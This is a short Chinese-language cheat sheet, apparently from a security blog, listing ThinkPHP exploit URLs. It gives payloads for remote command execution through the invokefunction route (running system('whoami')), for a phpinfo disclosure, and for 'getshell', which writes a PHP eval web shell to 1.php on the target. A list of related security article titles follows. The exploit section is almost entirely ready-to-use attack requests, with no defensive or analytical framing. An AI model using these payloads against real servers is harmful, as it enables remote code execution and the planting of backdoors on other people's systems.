Thinkphp(TP)

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
小黑子不会打篮球几秒前
[SWPUCTF 2021 新生赛]Do_you_know_http
网络·网络协议·web安全·http
白帽黑客鹏哥7 分钟前
花8000元去培训机构学习网络安全值得吗,学成后就业前景如何?
运维·网络·学习·安全·web安全
田鑫科技1 小时前
网络安全法中,个人信息保护的措施和原则有哪些?
安全·web安全
程序员小杨耶1 小时前
安全运维教程(非常详细)从零基础入门到精通,看完这一篇就够了_网络运维手册
运维·网络·计算机网络·安全·web安全·网络安全·系统安全
黑龙江亿林等保2 小时前
等保一体机:打造全方位网络安全防护
网络·安全·web安全
天下是个小趴菜3 小时前
php-cgi漏洞利用
安全·web安全·php
91数据恢复5 小时前
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
网络·安全·web安全
白帽黑客cst9 小时前
自学网络安全(黑客技术)2024年 —90天学习计划
网络·windows·python·学习·mysql·安全·web安全